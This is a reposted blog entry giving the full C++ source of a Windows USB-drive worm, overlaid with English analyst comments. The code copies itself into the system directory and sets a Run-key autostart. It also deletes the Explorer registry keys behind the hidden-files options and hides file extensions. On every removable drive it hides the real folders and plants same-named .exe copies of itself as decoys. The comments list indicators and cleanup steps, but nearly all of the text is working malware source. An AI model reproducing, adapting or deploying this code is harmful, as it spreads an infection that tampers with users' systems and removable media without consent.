  • 一种U盘病毒源码

    #include "stdafx.h"
    #include <windows.h>
    #include "resource.h"               
    /////////////////////////////////////////////////////
    // Analyst note: this is the sample's removable-drive propagation routine.
    // DriveBuf is used as a path prefix (OnDeviceChange passes a drive root). For every
    // top-level directory under it that is not already marked System or Hidden, the routine
    // sets HIDDEN|SYSTEM on the directory and copies the running executable beside it as
    // "<directory path>.exe".
    // Triage: on an affected volume expect top-level folders carrying both Hidden and System
    // attributes, each with a same-named .exe sibling; all siblings are byte-identical copies
    // of one module, so a single hash matches them all. Clearing the attributes
    // (e.g. `attrib -h -s`) and deleting the .exe siblings reverses what this routine changes.
    VOID DoBad(char DriveBuf[]);
    VOID DoBad(char DriveBuf[]) 
    {
            CFileFind finder;
            // build a string with wildcards
            CString strWildcard(DriveBuf);
            strWildcard += _T("*.*");
            char FileSource[MAX_PATH]={0}; 
            char FileNew[MAX_PATH]={0};
            // FileSource receives the full path of the currently running executable;
            // it is the source of every copy made below.
            HMODULE hModule=GetModuleHandle(NULL); 
            GetModuleFileName(hModule,FileSource,MAX_PATH); 
            CloseHandle(hModule);  
            // start working for files
            BOOL bWorking = finder.FindFile(strWildcard); 
            while (bWorking)
            {
                    bWorking = finder.FindNextFile();
                    // skip the "." and ".." entries
                    if (finder.IsDots()) 
                            continue;
                    // only directories that are not already System or Hidden are processed;
                    // nothing in this function descends into them (no recursion happens here)
                    if (finder.IsDirectory()&&!finder.IsSystem()&&!finder.IsHidden())
                    {       
                            // hide the real directory; if the attribute change fails, no copy is made for it
                            if(!SetFileAttributes(finder.GetFilePath(),FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))  //| FILE_ATTRIBUTE_SYSTEM
                                    continue; 
                // decoy name is the directory path with ".exe" appended
                sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe");
                            // third argument TRUE: the copy fails rather than overwriting an existing file
                            CopyFile(FileSource,FileNew,TRUE); 
                    }
            }
            finder.Close();
    }
    /////////////////////////////////////////////////////
    #include <dbt.h>
    // Global scratch buffer for the drive root string built in OnDeviceChange.
    char diskPath[5] = { 0 };
    // Analyst note: handler for WM_DEVICECHANGE, called from WndProc.
    // On DBT_DEVICEARRIVAL it walks the GetLogicalDrives() bitmask, and for the first root
    // path that reports DRIVE_REMOVABLE and answers GetVolumeInformation it calls DoBad, then
    // stops scanning. On DBT_DEVICEREMOVECOMPLETE it only shows a message box.
    // hwnd is not used; lParam is cast to lpdb but lpdb is never read. Always returns a
    // value-initialised LRESULT (0).
    // Defensive relevance: the trigger is media insertion, so the observable behaviour is a
    // background process writing .exe files to a removable volume right after it is mounted.
    // Blocking execution from removable media with application-control policy removes the
    // payoff of this technique.
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam);
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
    {
    //        char U[4];
            PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
            // bitmask of currently available logical drives; 0 means the call failed
            DWORD allDisk = GetLogicalDrives();
            if (allDisk!=0)
            {
            switch(wParam)
            {
            case DBT_DEVICEARRIVAL:
                    {
                    // up to 40 iterations, consuming one mask bit per pass (see the shift below)
                    for (int i=0;i<40;i++)
                    {
                            if ((allDisk & 1)==1)
                            {
                                    // root path is formed from the letter 'C'+i followed by ":\"
                                    sprintf(diskPath, "%c", 'C'+i ); 
                                    strcat(diskPath, ":\\" );
                                   
                                    if (GetDriveType(diskPath)==DRIVE_REMOVABLE )
                                    {
                                            // all output arguments are 0: the call is used only as a
                                            // success/failure probe of the volume
                                            if( GetVolumeInformation(diskPath,0,0,0,0,0,0,0) )
                                            {
                                                    //MessageBox( NULL,diskPath, "1",MB_OK );
                                                    DoBad(diskPath);
                                                    // only the first matching drive is handled per notification
                                                    break;
                                            }
                                    }
                            }
                            allDisk = allDisk>>1;
                    }
                    }
            break;
            case DBT_DEVICEREMOVECOMPLETE:
                    // message text is roughly "USB drive stopped", caption roughly "Virus notice!"
                    MessageBox( NULL,"停止U盘", "病毒提示!",MB_OK );
            break;
            }
            }
            return LRESULT();
    }

    // Analyst note: window procedure of the sample's hidden window.
    // Its only functional role is to forward WM_DEVICECHANGE to OnDeviceChange.
    // WM_CLOSE and WM_DESTROY return FALSE without reaching DefWindowProc, so the default
    // close handling does not run for this window. Every other message goes to DefWindowProc.
    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
    {
            switch(message)
            {
            case WM_CREATE:
                    break;
            case WM_DEVICECHANGE:
    //                if(modify_data.IsUpan)
                            // device arrival/removal notifications are the trigger for propagation
                            OnDeviceChange(hWnd,wParam,lParam);
                    break;
            case WM_CLOSE:
                    // swallowed: no DestroyWindow / DefWindowProc call is made here
                    return FALSE; 
            case WM_DESTROY:
                    // swallowed: no PostQuitMessage call is made here
                    return FALSE;
            default:
                    return DefWindowProc(hWnd,message,wParam,lParam);
            }
            return 0;
    }

    // Analyst note: creates the window that receives device-change broadcasts and then runs
    // the message loop for the rest of the process lifetime.
    // The window is registered with class name "WebDown", titled "hacker", and hidden with
    // SW_HIDE. It is not visible to the user, but both strings remain discoverable by
    // enumerating top-level windows, which makes them usable host indicators for this sample.
    // Returns 1 once GetMessage ends the loop.
    int CreateMyWindow();
    int CreateMyWindow()
    {
            MSG msg;
            WNDCLASS wndc;
            LPSTR szAppName="WebDown";
            wndc.style=0;
            // all messages for this class are routed to WndProc
            wndc.lpfnWndProc=WndProc;  
            wndc.cbClsExtra=0;
            wndc.cbWndExtra=0;
            wndc.hInstance=NULL;
            wndc.hIcon=NULL;
            wndc.hCursor=NULL;
            wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
            wndc.lpszMenuName=NULL;
            wndc.lpszClassName=szAppName;
            RegisterClass(&wndc);
            HWND hWnd=CreateWindow(szAppName,"hacker",
                    WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,
                    CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,NULL,NULL);
            // the window is never shown
            ShowWindow(hWnd,SW_HIDE);
            UpdateWindow(hWnd); 
           
            // one synthetic WM_DEVICECHANGE with wParam 0; neither case label in
            // OnDeviceChange matches 0, so this call does not trigger a drive scan
            SendMessage(hWnd,WM_DEVICECHANGE,0,0);
           
            // standard message pump; device-change broadcasts are delivered through here
            while(GetMessage(&msg,NULL,0,0))
            {
                    TranslateMessage(&msg);
                    DispatchMessage(&msg);
            }
            return 1;
    }

    /////////////////////////////////////////////////////
    // Analyst note: registry helper that removes lpSubKey under hKey together with its child keys.
    // It opens the subkey with KEY_ALL_ACCESS, repeatedly enumerates the child at index 0 and
    // recurses into it, then closes the handle and calls RegDeleteKey on the subkey itself.
    // No status is returned to the caller (both return statements are commented out), and a
    // failed open does not stop the function.
    // Defensive relevance: in this sample it is only called from FuckReg, against Explorer
    // "Folder\Hidden" subkeys. Registry auditing on those paths records the deletions.
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey);
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey) 
    {
            LONG lResult;
            HKEY hSubKey;
            DWORD   dwIndex, cbName;
            char   szSubKey[512];
            FILETIME   ft;
            lResult   =   RegOpenKeyEx(hKey,   lpSubKey,   0,   KEY_ALL_ACCESS,&hSubKey);
            if (lResult != ERROR_SUCCESS)
            {
                    // open failed; execution still continues past this block
                    RegCloseKey(hSubKey);
                    //                return lResult;
            }
            dwIndex = 0;
            // name buffer capacity in characters; set once, before the loop
            cbName = sizeof(szSubKey)/sizeof(szSubKey[0]);
            // index stays 0: each pass asks for the first remaining child and recurses into it
            while (ERROR_SUCCESS == (lResult = RegEnumKeyEx(hSubKey, dwIndex, szSubKey, &cbName, NULL, NULL, NULL, &ft)))
            {
                    DeleteSubKeyTree(hSubKey, szSubKey);
            }
            RegCloseKey(hSubKey);
            // finally delete the subkey itself
            lResult = RegDeleteKey(hKey, lpSubKey);
            //        return lResult;
    }


    // Analyst note: Explorer-settings tampering stage, called once from main.
    // Visible actions, in order:
    //   1. writes a "Text" string value under HKLM\...\Explorer\Advanced\Folder\Hidden;
    //   2. deletes the NOHIDDEN and SHOWALL subkeys of that key via DeleteSubKeyTree;
    //   3. sets HKCU\...\Explorer\Advanced\HideFileExt to 1.
    // NOTE(review): the Folder\Hidden subkeys are understood to back the hidden-files choices
    // in Explorer's Folder Options; confirm the effect on the Windows version being examined.
    // With HideFileExt=1 Explorer hides known extensions, so the "<folder>.exe" decoys written
    // by DoBad would display under the bare folder name.
    // Detection/recovery: alert on deletion of the two subkeys and on writes to HideFileExt.
    // Restore the subkeys from a known-good export of the same Windows build.
    // None of the registry return codes are checked here.
    void FuckReg();
    void FuckReg() 
    {
            HKEY hKey; 
            RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden",&hKey); 
        // string is roughly "This machine has been infected; this program is for testing - JACK"
        TCHAR *valueA=_T("机器已经中毒了  本程序测试使用—JACK");
            RegSetValueEx(hKey, "Text", NULL, REG_SZ, (LPBYTE)valueA, (DWORD) (lstrlen(valueA)+1));
            RegCloseKey(hKey); 
           
            // remove the NOHIDDEN subkey and everything beneath it
            LPCTSTR lpSubKey1= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN";
            HKEY hKey1 = HKEY_LOCAL_MACHINE;
            DeleteSubKeyTree(hKey1, lpSubKey1);
           
            // remove the SHOWALL subkey and everything beneath it
            LPCTSTR lpSubKey2= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
            HKEY hKey2 = HKEY_LOCAL_MACHINE;
            DeleteSubKeyTree(hKey2, lpSubKey2);
           
            // per-user Explorer setting: HideFileExt = 1 (REG_DWORD, 4 bytes)
            HKEY hKey3; 
            RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",&hKey3); 
            DWORD valueA3=1;
            RegSetValueEx(hKey3, "HideFileExt", NULL, REG_DWORD, (CONST BYTE *)(&valueA3),4);
            RegCloseKey(hKey3);  // close the handle
    }
    /////////////////////////////////////////////////////

    #include   <shellapi.h>
    #pragma comment(linker, "/ALIGN:4096")
    #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
    // Analyst note: entry point; the stages below run in this order.
    //   1. Derives a folder path from the executable's own path and asks the shell to
    //      "explore" it. This presumably opens the real folder that a decoy .exe stands in
    //      for, so a user who launched the decoy still sees the folder contents.
    //   2. Single-instance guard: a named mutex; a second instance exits immediately.
    //   3. Installation: copies itself to "<system directory>\hacker.exe".
    //   4. Persistence: writes value "hacker--JACK" under
    //      HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing at that copy.
    //   5. Calls FuckReg (Explorer settings) and CreateMyWindow (hidden window + message loop).
    // Host indicators present in this listing: the mutex name below, the file name hacker.exe
    // in the system directory, the Run value name "hacker--JACK", and the window class/title
    // set in CreateMyWindow.
    // Clean-up order for responders: end the process, delete the Run value and the file, then
    // repair the Explorer keys and the affected removable media.
    // Writing to the system directory and HKLM normally needs administrative rights, so running
    // users without them is expected to block stages 3-4; confirm per environment.
    int main()
    {
    //////////////////////////////////////
    char fullPath[MAX_PATH]; 
    HMODULE hModule=GetModuleHandle(NULL);  
    GetModuleFileName(hModule, fullPath,MAX_PATH);
    CString strPath=(CString)fullPath;
    // NOTE(review): '.exe' is a multi-character literal used where a single character is
    // expected; which character is searched for is implementation-dependent, so treat the
    // derived folder path as approximate when reproducing this in a sandbox.
    int ret=strPath.ReverseFind(_T('.exe'));  
    CString path=strPath.Left(ret-3)+_T("\\"); 
    //    MessageBox(path);   
        // opens the derived path in an Explorer window
        ShellExecute(NULL,"explore",path,NULL,NULL,SW_SHOWNORMAL);
    //        ShellExecute(NULL,"open",NULL,NULL,path,SW_SHOWNORMAL);

    // single-instance check; the mutex name is a stable indicator for this sample
    HANDLE m_hMutex=CreateMutex(NULL,FALSE,"ALALMN JACK 只做测试使用!!");
    if(GetLastError()==ERROR_ALREADY_EXISTS)
    {       
            CloseHandle(m_hMutex);
            m_hMutex=NULL;
            ExitProcess(0);
    }
    ///////////////////////////       
    char FileSource[MAX_PATH]={0};
    char FileNew[MAX_PATH]={0};
    HMODULE hModule1=GetModuleHandle(NULL);
    GetModuleFileName(hModule1,FileSource,MAX_PATH);
    CloseHandle(hModule1);
    // destination of the installed copy: <system directory>\hacker.exe
    GetSystemDirectory(FileNew,MAX_PATH);
    strcat(FileNew,"\\hacker.exe");
    ///////////////////////////       
    // TRUE: an existing hacker.exe is not overwritten
    CopyFile(FileSource,FileNew,TRUE);
    HKEY hkey=HKEY_LOCAL_MACHINE;  
    char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";  
    HKEY phkResult;
    int len=sizeof(FileNew); 
    // open the machine-wide Run key, creating it if the open fails
    if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS) 
    {
            ::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL); 
    }       
    // the query is issued on hkey with the subkey path as the value name; whenever it does not
    // return ERROR_SUCCESS the autorun value "hacker--JACK" is written with the installed path
    if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&FileNew,(unsigned long *)&len)!=ERROR_SUCCESS)  
            ::RegSetValueEx(phkResult,"hacker--JACK",0,REG_SZ,(LPBYTE)FileNew, (DWORD)(lstrlen(FileNew)+1)); 
    ::RegCloseKey(phkResult); 
    ///////////////////////////       
    FuckReg(); 
    // does not return until the message loop inside it ends
    CreateMyWindow(); 
    //-------------------------
    //while (1)   // create an infinite loop, otherwise the main thread exits
    //{
    //        Sleep(1000);
    //}
    //---------------------
    return 0;
    }

  • 原文地址:https://www.cnblogs.com/buffer/p/1412630.html